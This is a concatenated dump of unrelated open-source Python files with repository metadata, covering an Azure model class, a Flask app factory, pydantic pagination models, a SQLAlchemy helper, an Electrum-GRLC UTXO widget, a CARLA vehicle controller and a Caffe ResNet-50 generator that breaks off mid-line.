disk_size_gb: The disk size of the worker VMs. :type disk_size_gb: int :param subnet_id: The Azure resource ID of the worker subnet. :type subnet_id: str :param count: The number of worker VMs. :type count: int """ _attribute_map = { 'name': {'key': 'name', 'type': 'str'}, 'vm_size': {'key': 'vmSize', 'type': 'str'}, 'disk_size_gb': {'key': 'diskSizeGB', 'type': 'int'}, 'subnet_id': {'key': 'subnetId', 'type': 'str'}, 'count': {'key': 'count', 'type': 'int'}, } def __init__(self, *, name: str=None, vm_size=None, disk_size_gb: int=None, subnet_id: str=None, count: int=None, **kwargs) -> None: super(WorkerProfile, self).__init__(**kwargs) self.name = name self.vm_size = vm_size self.disk_size_gb = disk_size_gb self.subnet_id = subnet_id self.count = count
39.633557
283
0.66827
c1b7bd4faff6f6fef82a82bf91cebd837356d2dc
989
py
Python
backend/api/__init__.py
EylonKoenig/LS_Technology_interview_assessment
6911391fb86a6e2fca97af86580b2a0d58550baf
[ "MIT" ]
null
null
null
backend/api/__init__.py
EylonKoenig/LS_Technology_interview_assessment
6911391fb86a6e2fca97af86580b2a0d58550baf
[ "MIT" ]
null
null
null
backend/api/__init__.py
EylonKoenig/LS_Technology_interview_assessment
6911391fb86a6e2fca97af86580b2a0d58550baf
[ "MIT" ]
null
null
null
import os from flask import Flask from flask_cors import CORS from flask_mongoengine import MongoEngine from flask_jwt_extended import JWTManager from datetime import timedelta # from flask import Response, request db = MongoEngine() def create_app(): app = Flask(__name__) CORS(app, resources={r"/*": {"origins": "*"}}) app.config['MONGODB_SETTINGS'] = { 'host': os.environ['MONGODB_HOST'], 'username': os.environ['MONGODB_USERNAME'], 'password': os.environ['MONGODB_PASSWORD'], 'db': 'webapp' } app.config["JWT_SECRET_KEY"] = os.environ["JWT_SECRET_KEY"] app.config["JWT_ACCESS_TOKEN_EXPIRES"] = timedelta(days=1) app.config["JWT_REFRESH_TOKEN_EXPIRES"] = timedelta(days=15) from .routes import auth app.register_blueprint(auth.auth_bluprint) from .routes import employees app.register_blueprint(employees.employees_bluprint) db.init_app(app) JWTManager(app) return app
21.977778
64
0.690597
c5031c8dd8c7d4ac4badfcceeb7a31cf6b95383d
506
py
Python
tests/TestCaseTest.py
tetrohed/pyst
a7906c356802169051ce15db66d204e78f24d66b
[ "MIT" ]
null
null
null
tests/TestCaseTest.py
tetrohed/pyst
a7906c356802169051ce15db66d204e78f24d66b
[ "MIT" ]
null
null
null
tests/TestCaseTest.py
tetrohed/pyst
a7906c356802169051ce15db66d204e78f24d66b
[ "MIT" ]
null
null
null
if __name__ == '__main__': import sys from os import path sys.path.append(path.join(path.dirname(__file__), '..')) from Pyst import TestCase, WasRun class TestCaseTest(TestCase): def setUp(self): self.test = WasRun('testMethod') def testRunning(self): self.test.run() assert(self.test.wasRun) def testSetUp(self): self.test.run() assert(self.test.wasSetUp) TestCaseTest('testSetUp').run() TestCaseTest('testRunning').run()
21.083333
60
0.632411
31db29ccb37473f8381c9a78f8ab253aad35d85b
1,130
py
Python
tests/storage/cases/test_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.py
juztin/pytezos-1
7e608ff599d934bdcf129e47db43dbdb8fef9027
[ "MIT" ]
1
2021-05-20T16:52:08.000Z
2021-05-20T16:52:08.000Z
tests/storage/cases/test_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.py
juztin/pytezos-1
7e608ff599d934bdcf129e47db43dbdb8fef9027
[ "MIT" ]
1
2020-12-30T16:44:56.000Z
2020-12-30T16:44:56.000Z
tests/storage/cases/test_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.py
tqtezos/pytezos
a4ac0b022d35d4c9f3062609d8ce09d584b5faa8
[ "MIT" ]
1
2022-03-20T19:01:00.000Z
2022-03-20T19:01:00.000Z
from unittest import TestCase from tests import get_data from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson class StorageTestKT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(TestCase): @classmethod def setUpClass(cls): cls.maxDiff = None cls.contract = get_data('storage/zeronet/KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8.json') def test_storage_encoding_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(self): type_expr = self.contract['script']['code'][1] val_expr = self.contract['script']['storage'] schema = build_schema(type_expr) decoded = decode_micheline(val_expr, type_expr, schema) actual = encode_micheline(decoded, schema) self.assertEqual(val_expr, actual) def test_storage_schema_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(self): _ = build_schema(self.contract['script']['code'][0]) def test_storage_format_KT1JEL7ASRFP98Ma9dnLswaCnTbtZr6aPez8(self): _ = micheline_to_michelson(self.contract['script']['code']) _ = micheline_to_michelson(self.contract['script']['storage'])
40.357143
112
0.748673
35c8fe7d00c96a573757764ebafe9669144bd599
975
py
Python
fixture/application.py
LenaRad/python_training
0d3909f6c30553852523c5e9222b31ad63d90fec
[ "Apache-2.0" ]
null
null
null
fixture/application.py
LenaRad/python_training
0d3909f6c30553852523c5e9222b31ad63d90fec
[ "Apache-2.0" ]
null
null
null
fixture/application.py
LenaRad/python_training
0d3909f6c30553852523c5e9222b31ad63d90fec
[ "Apache-2.0" ]
null
null
null
from selenium import webdriver from fixture.session import SessionHelper from fixture.group import GroupHelper from fixture.contact import ContactHelper class Application: def __init__(self, browser, base_url): if browser == "firefox": self.wd = webdriver.Firefox(capabilities={"marionette": False}) elif browser == "chrome": self.wd = webdriver.Chrome() elif browser == "ie": self.wd = webdriver.Ie() else: raise ValueError("Unrecognized browser %s" % browser) self.session = SessionHelper(self) self.group = GroupHelper(self) self.contact = ContactHelper(self) self.base_url = base_url def is_valid(self): try: self.wd.current_url return True except: return False def open_home_page(self): wd = self.wd wd.get(self.base_url) def destroy(self): self.wd.quit()
26.351351
75
0.606154
409fcf1321996e20e20cc7ac5965eeb813c73c55
5,649
py
Python
packages/models-library/src/models_library/rest_pagination.py
sanderegg/osparc-simcore
13560a554c52b07e2aba67f77baaf4d5ba9edb90
[ "MIT" ]
null
null
null
packages/models-library/src/models_library/rest_pagination.py
sanderegg/osparc-simcore
13560a554c52b07e2aba67f77baaf4d5ba9edb90
[ "MIT" ]
55
2018-05-15T09:47:00.000Z
2022-03-31T06:56:50.000Z
packages/models-library/src/models_library/rest_pagination.py
odeimaiz/osparc-simcore
71c2fc58dcfe067487dcd75cb70298a4d6237e97
[ "MIT" ]
1
2020-04-22T15:06:58.000Z
2020-04-22T15:06:58.000Z
from typing import Generic, List, Optional, TypeVar from pydantic import ( AnyHttpUrl, BaseModel, Extra, Field, NonNegativeInt, PositiveInt, validator, ) from pydantic.generics import GenericModel DEFAULT_NUMBER_OF_ITEMS_PER_PAGE = 20 def monkey_patch_pydantic_url_regex() -> None: # waiting for PR https://github.com/samuelcolvin/pydantic/pull/2512 to be released into # pydantic main codebase import pydantic if pydantic.VERSION > "1.8.2": raise RuntimeError( ( "Please check that PR https://github.com/samuelcolvin/pydantic/pull/2512 " "was merged AND added in this version." "If already present in this version, remove this monkey_patch" ) ) import re from typing import Pattern from pydantic import networks def url_regex() -> Pattern[str]: _url_regex_cache = networks._url_regex_cache # pylint: disable=protected-access if _url_regex_cache is None: _url_regex_cache = re.compile( r"(?:(?P<scheme>[a-z][a-z0-9+\-.]+)://)?" # scheme https://tools.ietf.org/html/rfc3986#appendix-A r"(?:(?P<user>[^\s:/]*)(?::(?P<password>[^\s/]*))?@)?" # user info r"(?:" r"(?P<ipv4>(?:\d{1,3}\.){3}\d{1,3})(?=$|[/:#?])|" # ipv4 r"(?P<ipv6>\[[A-F0-9]*:[A-F0-9:]+\])(?=$|[/:#?])|" # ipv6 r"(?P<domain>[^\s/:?#]+)" # domain, validation occurs later r")?" r"(?::(?P<port>\d+))?" # port r"(?P<path>/[^\s?#]*)?" # path r"(?:\?(?P<query>[^\s#]+))?" # query r"(?:#(?P<fragment>\S+))?", # fragment re.IGNORECASE, ) return _url_regex_cache networks.url_regex = url_regex monkey_patch_pydantic_url_regex() class PageMetaInfoLimitOffset(BaseModel): limit: PositiveInt = DEFAULT_NUMBER_OF_ITEMS_PER_PAGE total: NonNegativeInt offset: NonNegativeInt = 0 count: NonNegativeInt @validator("offset") @classmethod def check_offset(cls, v, values): if v > 0 and v >= values["total"]: raise ValueError( f"offset {v} cannot be equal or bigger than total {values['total']}, please check" ) return v @validator("count") @classmethod def check_count(cls, v, values): if v > values["limit"]: raise ValueError( f"count {v} bigger than limit {values['limit']}, please check" ) if v > values["total"]: raise ValueError( f"count {v} bigger than expected total {values['total']}, please check" ) if "offset" in values and (values["offset"] + v) > values["total"]: raise ValueError( f"offset {values['offset']} + count {v} is bigger than allowed total {values['total']}, please check" ) return v class Config: extra = Extra.forbid schema_extra = { "examples": [ {"total": 7, "count": 4, "limit": 4, "offset": 0}, ] } class PageLinks(BaseModel): self: AnyHttpUrl first: AnyHttpUrl prev: Optional[AnyHttpUrl] next: Optional[AnyHttpUrl] last: AnyHttpUrl class Config: extra = Extra.forbid ItemT = TypeVar("ItemT") class Page(GenericModel, Generic[ItemT]): """ Paginated response model of ItemTs """ meta: PageMetaInfoLimitOffset = Field(alias="_meta") links: PageLinks = Field(alias="_links") data: List[ItemT] @validator("data", pre=True) @classmethod def convert_none_to_empty_list(cls, v): if v is None: v = [] return v @validator("data") @classmethod def check_data_compatible_with_meta(cls, v, values): if "meta" not in values: # if the validation failed in meta this happens raise ValueError("meta not in values") if len(v) != values["meta"].count: raise ValueError( f"container size [{len(v)}] must be equal to count [{values['meta'].count}]" ) return v class Config: extra = Extra.forbid schema_extra = { "examples": [ # first page Page[str] { "_meta": {"total": 7, "count": 4, "limit": 4, "offset": 0}, "_links": { "self": "http://osparc.io/v2/listing?offset=0&limit=4", "first": "http://osparc.io/v2/listing?offset=0&limit=4", "prev": None, "next": "http://osparc.io/v2/listing?offset=1&limit=4", "last": "http://osparc.io/v2/listing?offset=1&limit=4", }, "data": ["data 1", "data 2", "data 3", "data 4"], }, # second and last page { "_meta": {"total": 7, "count": 3, "limit": 4, "offset": 1}, "_links": { "self": "http://osparc.io/v2/listing?offset=1&limit=4", "first": "http://osparc.io/v2/listing?offset=0&limit=4", "prev": "http://osparc.io/v2/listing?offset=0&limit=4", "next": None, "last": "http://osparc.io/v2/listing?offset=1&limit=4", }, "data": ["data 5", "data 6", "data 7"], }, ] }
32.096591
117
0.506992
fb8bfc144ef36a0d4f926e6b570a842f1a7a66ca
2,957
py
Python
backend/corpora/common/utils/db_utils.py
isabella232/corpora-data-portal
09ed3cad3165f8b0db854b76404e0d5d0ea0b7d9
[ "MIT" ]
null
null
null
backend/corpora/common/utils/db_utils.py
isabella232/corpora-data-portal
09ed3cad3165f8b0db854b76404e0d5d0ea0b7d9
[ "MIT" ]
1
2021-02-23T22:56:13.000Z
2021-02-23T22:56:13.000Z
backend/corpora/common/utils/db_utils.py
isabella232/corpora-data-portal
09ed3cad3165f8b0db854b76404e0d5d0ea0b7d9
[ "MIT" ]
null
null
null
import functools import logging import typing from contextlib import contextmanager from sqlalchemy.exc import SQLAlchemyError from .exceptions import CorporaException from ..corpora_orm import Base, DBSessionMaker logger = logging.getLogger(__name__) class DbUtils: """DbUtils as a singleton to avoid creating excess sessions.""" __instance = None class __DbUtils: def __init__(self): self._session = None @property def session(self): if not self._session: self._session = DBSessionMaker().session() return self._session def get(self, table: Base, entity_id: typing.Union[str, typing.Tuple[str]]) -> typing.Union[Base, None]: """ Query a table row by its primary key :param table: SQLAlchemy Table to query :param entity_id: Primary key of desired row :return: SQLAlchemy Table object, None if not found """ return self.session.query(table).get(entity_id) def query(self, table_args: typing.List[Base], filter_args: typing.List[bool] = None) -> typing.List[Base]: """ Query the database using the current DB session :param table_args: List of SQLAlchemy Tables to query/join :param filter_args: List of SQLAlchemy filter conditions :return: List of SQLAlchemy query response objects """ return ( self.session.query(*table_args).filter(*filter_args).all() if filter_args else self.session.query(*table_args).all() ) def commit(self): """ Commit changes to the database and roll back if error. """ self.session.commit() def delete(self, db_object: Base): self.session.delete(db_object) def close(self): self.session.close() self._session = None def __init__(self): if not DbUtils.__instance: DbUtils.__instance = DbUtils.__DbUtils() def __getattr__(self, name): return getattr(self.__instance, name) @contextmanager def db_session_manager(commit=False): """ :param commit: Changes will be committed when context ends. """ try: db = DbUtils() yield db if commit: db.commit() except SQLAlchemyError: db.session.rollback() msg = "Failed to commit." logger.exception(msg) raise CorporaException(msg) finally: db.close() def db_session(commit=False): """ :param commit: passed to db_session_manager """ def decorator(func): @functools.wraps(func) def wrapper(*args, **kwargs): with db_session_manager(commit): rv = func(*args, **kwargs) return rv return wrapper return decorator
27.37963
115
0.595536
1cc6c0247a3d41cae0569d2ce12d2d8ff1fec709
595
py
Python
code/pandas/pd_duplicated.py
yuguiyang/python_demo
1be2406bfc920e22a0f92bf10d9a3665984067ba
[ "Apache-2.0" ]
null
null
null
code/pandas/pd_duplicated.py
yuguiyang/python_demo
1be2406bfc920e22a0f92bf10d9a3665984067ba
[ "Apache-2.0" ]
null
null
null
code/pandas/pd_duplicated.py
yuguiyang/python_demo
1be2406bfc920e22a0f92bf10d9a3665984067ba
[ "Apache-2.0" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Tue Aug 15 16:03:44 2017 @author: hexo """ import pandas as pd import numpy as np data = pd.DataFrame({'k1': ['one'] * 3 + ['two'] * 4, 'k2': [1, 1, 2, 3, 3, 4, 4]}) data data.duplicated() data.drop_duplicates() data['v1'] = range(7) data.drop_duplicates(['k1']) data.drop_duplicates(['k1', 'k2'], take_last=True) #重复数据 data = pd.Series([1., -999., 2., -999., -1000., 3.]) data data.replace(-999, np.nan) data.replace([-999, -1000], np.nan) data.replace([-999, -1000], [np.nan, 0]) data.replace({-999: np.nan, -1000: 0})
14.875
53
0.573109
0f106d2e9b61e5a496d7cecc5027dd1ac994a78c
10,496
py
Python
electrum_grlc/gui/qt/utxo_list.py
garlico-in/electrum-grlc
06ba1b330ef354ca575d0688cbd2d64a90fd276e
[ "MIT" ]
null
null
null
electrum_grlc/gui/qt/utxo_list.py
garlico-in/electrum-grlc
06ba1b330ef354ca575d0688cbd2d64a90fd276e
[ "MIT" ]
null
null
null
electrum_grlc/gui/qt/utxo_list.py
garlico-in/electrum-grlc
06ba1b330ef354ca575d0688cbd2d64a90fd276e
[ "MIT" ]
null
null
null
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2015 Thomas Voegtlin # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. from typing import Optional, List, Dict, Sequence, Set from enum import IntEnum import copy from PyQt5.QtCore import Qt from PyQt5.QtGui import QStandardItemModel, QStandardItem, QFont from PyQt5.QtWidgets import QAbstractItemView, QMenu, QLabel, QHBoxLayout from electrum_grlc.i18n import _ from electrum_grlc.transaction import PartialTxInput from .util import MyTreeView, ColorScheme, MONOSPACE_FONT, EnterButton class UTXOList(MyTreeView): _spend_set: Optional[Set[str]] # coins selected by the user to spend from _utxo_dict: Dict[str, PartialTxInput] # coin name -> coin class Columns(IntEnum): OUTPOINT = 0 ADDRESS = 1 LABEL = 2 AMOUNT = 3 HEIGHT = 4 headers = { Columns.ADDRESS: _('Address'), Columns.LABEL: _('Label'), Columns.AMOUNT: _('Amount'), Columns.HEIGHT: _('Height'), Columns.OUTPOINT: _('Output point'), } filter_columns = [Columns.ADDRESS, Columns.LABEL, Columns.OUTPOINT] stretch_column = Columns.LABEL ROLE_PREVOUT_STR = Qt.UserRole + 1000 def __init__(self, parent): super().__init__(parent, self.create_menu, stretch_column=self.stretch_column) self._spend_set = None self._utxo_dict = {} self.wallet = self.parent.wallet self.setModel(QStandardItemModel(self)) self.setSelectionMode(QAbstractItemView.ExtendedSelection) self.setSortingEnabled(True) self.update() def update(self): # not calling maybe_defer_update() as it interferes with coincontrol status bar utxos = self.wallet.get_utxos() self._maybe_reset_spend_list(utxos) self._utxo_dict = {} self.model().clear() self.update_headers(self.__class__.headers) for idx, utxo in enumerate(utxos): self.insert_utxo(idx, utxo) self.filter() # update coincontrol status bar if self._spend_set is not None: coins = [self._utxo_dict[x] for x in self._spend_set] coins = self._filter_frozen_coins(coins) amount = sum(x.value_sats() for x in coins) amount_str = self.parent.format_amount_and_units(amount) num_outputs_str = _("{} outputs available ({} total)").format(len(coins), len(utxos)) self.parent.set_coincontrol_msg(_("Coin control active") + f': {num_outputs_str}, {amount_str}') else: self.parent.set_coincontrol_msg(None) def insert_utxo(self, idx, utxo: PartialTxInput): address = utxo.address height = utxo.block_height name = utxo.prevout.to_str() name_short = utxo.prevout.txid.hex()[:16] + '...' + ":%d" % utxo.prevout.out_idx self._utxo_dict[name] = utxo label = self.wallet.get_label_for_txid(utxo.prevout.txid.hex()) or self.wallet.get_label(address) amount = self.parent.format_amount(utxo.value_sats(), whitespaces=True) labels = [name_short, address, label, amount, '%d'%height] utxo_item = [QStandardItem(x) for x in labels] self.set_editability(utxo_item) utxo_item[self.Columns.OUTPOINT].setData(name, self.ROLE_CLIPBOARD_DATA) utxo_item[self.Columns.OUTPOINT].setData(name, self.ROLE_PREVOUT_STR) utxo_item[self.Columns.ADDRESS].setFont(QFont(MONOSPACE_FONT)) utxo_item[self.Columns.AMOUNT].setFont(QFont(MONOSPACE_FONT)) utxo_item[self.Columns.OUTPOINT].setFont(QFont(MONOSPACE_FONT)) SELECTED_TO_SPEND_TOOLTIP = _('Coin selected to be spent') if name in (self._spend_set or set()): for col in utxo_item: col.setBackground(ColorScheme.GREEN.as_color(True)) if col != self.Columns.OUTPOINT: col.setToolTip(SELECTED_TO_SPEND_TOOLTIP) if self.wallet.is_frozen_address(address): utxo_item[self.Columns.ADDRESS].setBackground(ColorScheme.BLUE.as_color(True)) utxo_item[self.Columns.ADDRESS].setToolTip(_('Address is frozen')) if self.wallet.is_frozen_coin(utxo): utxo_item[self.Columns.OUTPOINT].setBackground(ColorScheme.BLUE.as_color(True)) utxo_item[self.Columns.OUTPOINT].setToolTip(f"{name}\n{_('Coin is frozen')}") else: tooltip = ("\n" + SELECTED_TO_SPEND_TOOLTIP) if name in (self._spend_set or set()) else "" utxo_item[self.Columns.OUTPOINT].setToolTip(name + tooltip) self.model().insertRow(idx, utxo_item) def get_selected_outpoints(self) -> Optional[List[str]]: if not self.model(): return None items = self.selected_in_column(self.Columns.OUTPOINT) return [x.data(self.ROLE_PREVOUT_STR) for x in items] def _filter_frozen_coins(self, coins: List[PartialTxInput]) -> List[PartialTxInput]: coins = [utxo for utxo in coins if (not self.wallet.is_frozen_address(utxo.address) and not self.wallet.is_frozen_coin(utxo))] return coins def set_spend_list(self, coins: Optional[List[PartialTxInput]]): if coins is not None: coins = self._filter_frozen_coins(coins) self._spend_set = {utxo.prevout.to_str() for utxo in coins} else: self._spend_set = None self.update() def get_spend_list(self) -> Optional[Sequence[PartialTxInput]]: if self._spend_set is None: return None utxos = [self._utxo_dict[x] for x in self._spend_set] return copy.deepcopy(utxos) # copy so that side-effects don't affect utxo_dict def _maybe_reset_spend_list(self, current_wallet_utxos: Sequence[PartialTxInput]) -> None: if self._spend_set is None: return # if we spent one of the selected UTXOs, just reset selection utxo_set = {utxo.prevout.to_str() for utxo in current_wallet_utxos} if not all([prevout_str in utxo_set for prevout_str in self._spend_set]): self._spend_set = None def create_menu(self, position): selected = self.get_selected_outpoints() if selected is None: return menu = QMenu() menu.setSeparatorsCollapsible(True) # consecutive separators are merged together coins = [self._utxo_dict[name] for name in selected] if len(coins) == 0: menu.addAction(_("Spend (select none)"), lambda: self.set_spend_list(coins)) else: menu.addAction(_("Spend"), lambda: self.set_spend_list(coins)) if len(coins) == 1: utxo = coins[0] addr = utxo.address txid = utxo.prevout.txid.hex() # "Details" tx = self.wallet.db.get_transaction(txid) if tx: label = self.wallet.get_label_for_txid(txid) menu.addAction(_("Details"), lambda: self.parent.show_transaction(tx, tx_desc=label)) # "Copy ..." idx = self.indexAt(position) if not idx.isValid(): return self.add_copy_menu(menu, idx) # "Freeze coin" if not self.wallet.is_frozen_coin(utxo): menu.addAction(_("Freeze Coin"), lambda: self.parent.set_frozen_state_of_coins([utxo], True)) else: menu.addSeparator() menu.addAction(_("Coin is frozen"), lambda: None).setEnabled(False) menu.addAction(_("Unfreeze Coin"), lambda: self.parent.set_frozen_state_of_coins([utxo], False)) menu.addSeparator() # "Freeze address" if not self.wallet.is_frozen_address(addr): menu.addAction(_("Freeze Address"), lambda: self.parent.set_frozen_state_of_addresses([addr], True)) else: menu.addSeparator() menu.addAction(_("Address is frozen"), lambda: None).setEnabled(False) menu.addAction(_("Unfreeze Address"), lambda: self.parent.set_frozen_state_of_addresses([addr], False)) menu.addSeparator() elif len(coins) > 1: # multiple items selected menu.addSeparator() addrs = [utxo.address for utxo in coins] is_coin_frozen = [self.wallet.is_frozen_coin(utxo) for utxo in coins] is_addr_frozen = [self.wallet.is_frozen_address(utxo.address) for utxo in coins] if not all(is_coin_frozen): menu.addAction(_("Freeze Coins"), lambda: self.parent.set_frozen_state_of_coins(coins, True)) if any(is_coin_frozen): menu.addAction(_("Unfreeze Coins"), lambda: self.parent.set_frozen_state_of_coins(coins, False)) if not all(is_addr_frozen): menu.addAction(_("Freeze Addresses"), lambda: self.parent.set_frozen_state_of_addresses(addrs, True)) if any(is_addr_frozen): menu.addAction(_("Unfreeze Addresses"), lambda: self.parent.set_frozen_state_of_addresses(addrs, False)) menu.exec_(self.viewport().mapToGlobal(position)) def get_filter_data_from_coordinate(self, row, col): if col == self.Columns.OUTPOINT: return self.get_role_data_from_coordinate(row, col, role=self.ROLE_PREVOUT_STR) return super().get_filter_data_from_coordinate(row, col)
46.648889
120
0.657298
e9fad523e9374bfeb845f19f6412e635aed4df7e
3,812
py
Python
haco/DIDrive_core/simulators/srunner/scenariomanager/actorcontrols/npc_vehicle_control.py
decisionforce/HACO
ebd1dc49598e6ae2704e58c053cc35f2d9e28429
[ "Apache-2.0" ]
21
2022-02-15T10:11:54.000Z
2022-03-24T17:44:29.000Z
haco/DIDrive_core/simulators/srunner/scenariomanager/actorcontrols/npc_vehicle_control.py
decisionforce/HACO
ebd1dc49598e6ae2704e58c053cc35f2d9e28429
[ "Apache-2.0" ]
null
null
null
haco/DIDrive_core/simulators/srunner/scenariomanager/actorcontrols/npc_vehicle_control.py
decisionforce/HACO
ebd1dc49598e6ae2704e58c053cc35f2d9e28429
[ "Apache-2.0" ]
3
2022-02-22T11:11:43.000Z
2022-03-17T17:58:44.000Z
#!/usr/bin/env python # Copyright (c) 2020 Intel Corporation # # This work is licensed under the terms of the MIT license. # For a copy, see <https://opensource.org/licenses/MIT>. """ This module provides an example control for vehicles """ import math import carla from haco.DIDrive_core.utils.simulator_utils.carla_agents.navigation.basic_agent import LocalPlanner from haco.DIDrive_core.utils.simulator_utils.carla_agents.navigation.local_planner import RoadOption from haco.DIDrive_core.simulators.carla_data_provider import CarlaDataProvider from haco.DIDrive_core.simulators.srunner.scenariomanager.actorcontrols.basic_control import BasicControl class NpcVehicleControl(BasicControl): """ Controller class for vehicles derived from BasicControl. The controller makes use of the LocalPlanner implemented in CARLA. Args: actor (carla.Actor): Vehicle actor that should be controlled. """ _args = {'K_P': 1.0, 'K_D': 0.01, 'K_I': 0.0, 'dt': 0.05} def __init__(self, actor, args=None): super(NpcVehicleControl, self).__init__(actor) self._local_planner = LocalPlanner( # pylint: disable=undefined-variable self._actor, opt_dict={ 'target_speed': self._target_speed * 3.6, 'lateral_control_dict': self._args}) if self._waypoints: self._update_plan() def _update_plan(self): """ Update the plan (waypoint list) of the LocalPlanner """ plan = [] for transform in self._waypoints: waypoint = CarlaDataProvider.get_map().get_waypoint( transform.location, project_to_road=True, lane_type=carla.LaneType.Any ) plan.append((waypoint, RoadOption.LANEFOLLOW)) self._local_planner.set_global_plan(plan) def reset(self): """ Reset the controller """ if self._actor and self._actor.is_alive: if self._local_planner: self._local_planner.reset_vehicle() self._local_planner = None self._actor = None def run_step(self): """ Execute on tick of the controller's control loop If _waypoints are provided, the vehicle moves towards the next waypoint with the given _target_speed, until reaching the final waypoint. Upon reaching the final waypoint, _reached_goal is set to True. If _waypoints is empty, the vehicle moves in its current direction with the given _target_speed. If _init_speed is True, the control command is post-processed to ensure that the initial actor velocity is maintained independent of physics. """ self._reached_goal = False if self._waypoints_updated: self._waypoints_updated = False self._update_plan() target_speed = self._target_speed self._local_planner.set_speed(target_speed * 3.6) control = self._local_planner.run_step(debug=False) # Check if the actor reached the end of the plan if self._local_planner.done(): self._reached_goal = True self._actor.apply_control(control) if self._init_speed: current_speed = math.sqrt(self._actor.get_velocity().x ** 2 + self._actor.get_velocity().y ** 2) # If _init_speed is set, and the PID controller is not yet up to the point to take over, # we manually set the vehicle to drive with the correct velocity if abs(target_speed - current_speed) > 3: yaw = self._actor.get_transform().rotation.yaw * (math.pi / 180) vx = math.cos(yaw) * target_speed vy = math.sin(yaw) * target_speed self._actor.set_velocity(carla.Vector3D(vx, vy, 0))
36.304762
108
0.663169
60ba267a6bebd580aeedf342a3ed46329af52c54
7,360
py
Python
models/market1501/generate_resnet50.py
zhunzhong07/caffe-reid
7468850ab80858006bd65bcc6203e0581c83aea9
[ "BSD-2-Clause" ]
3
2017-03-16T07:42:31.000Z
2021-07-15T22:09:46.000Z
models/market1501/generate_resnet50.py
zhunzhong07/caffe-reid
7468850ab80858006bd65bcc6203e0581c83aea9
[ "BSD-2-Clause" ]
null
null
null
models/market1501/generate_resnet50.py
zhunzhong07/caffe-reid
7468850ab80858006bd65bcc6203e0581c83aea9
[ "BSD-2-Clause" ]
2
2019-03-09T02:47:50.000Z
2020-08-24T15:43:38.000Z
import _init_paths import os import os.path as osp import caffe from caffe import layers as L, params as P from caffe import tools from caffe.model_libs import * def res_unit(net, bottom, in_c, out_c, stride, base_name, post, is_train=False): assert (out_c % 4 == 0) pase_name = base_name base_name = base_name + post if (in_c != out_c): #param = pase_name + '_branch1' net['res'+base_name+'_branch1'], net['bn'+base_name+'_branch1'], net['scale'+base_name+'_branch1'] = \ conv_bn_scale(bottom, 1, out_c, stride=stride, is_train=is_train, has_relu=False, bias_term=False) #conv_bn_scale(bottom, 1, out_c, base_param_name=param, stride=stride, is_train=is_train, has_relu=False, bias_term=False) identity = net['scale'+base_name+'_branch1'] else: identity = bottom #param = pase_name + '_branch2a' net['res'+base_name+'_branch2a'], net['bn'+base_name+'_branch2a'], net['scale'+base_name+'_branch2a'], net['res'+base_name+'_branch2a_relu'] = \ conv_bn_scale(bottom, 1, out_c/4, stride=stride, is_train=is_train, has_relu=True, bias_term=False) #conv_bn_scale(bottom, 1, out_c/4, base_param_name=param, stride=stride, is_train=is_train, has_relu=True, bias_term=False) #param = pase_name + '_branch2b' net['res'+base_name+'_branch2b'], net['bn'+base_name+'_branch2b'], net['scale'+base_name+'_branch2b'], net['res'+base_name+'_branch2b_relu'] = \ conv_bn_scale(net['res'+base_name+'_branch2a_relu'], 3, out_c/4, pad=1, is_train=is_train, has_relu=True, bias_term=False) #conv_bn_scale(net['res'+base_name+'_branch2a_relu'], 3, out_c/4, base_param_name=param, pad=1, is_train=is_train, has_relu=True, bias_term=False) #param = pase_name + '_branch2c' net['res'+base_name+'_branch2c'], net['bn'+base_name+'_branch2c'], net['scale'+base_name+'_branch2c'] = \ conv_bn_scale(net['res'+base_name+'_branch2b_relu'], 1, out_c, is_train=is_train, has_relu=False, bias_term=False) #conv_bn_scale(net['res'+base_name+'_branch2b_relu'], 1, out_c, base_param_name=param, is_train=is_train, has_relu=False, bias_term=False) final = net['scale'+base_name+'_branch2c'] net['res'+base_name] = L.Eltwise(identity, final) net['res'+base_name+'_relu'] = L.ReLU(net['res'+base_name], in_place=True) final_name = 'res'+base_name+'_relu' return net, final_name def res50_body(net, data, post, is_train): net['conv1'+post], net['bn_conv1'+post], net['scale_conv1'+post], net['conv1_relu'+post] = \ conv_bn_scale(net[data], 7, 64, pad = 3, stride = 2, is_train=is_train, has_relu=True) net['pool1'+post] = max_pool(net['conv1_relu'+post], 3, stride=2) names, outs = ['2a', '2b', '2c'], [256, 256, 256] pre_out = 64 final = 'pool1'+post for (name, out) in zip(names, outs): net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train) pre_out = out names, outs = ['3a', '3b', '3c', '3d'], [512, 512, 512, 512] for (name, out) in zip(names, outs): if (name == '3a'): net, final = res_unit(net, net[final], pre_out, out, 2, name, post, is_train=is_train) else: net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train) pre_out = out names = ['4a', '4b', '4c', '4d', '4e', '4f'] out = 1024 for name in names: if (name == '4a'): net, final = res_unit(net, net[final], pre_out, out, 2, name, post, is_train=is_train) else: net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train) pre_out = out names = ['5a', '5b', '5c'] out = 2048 for name in 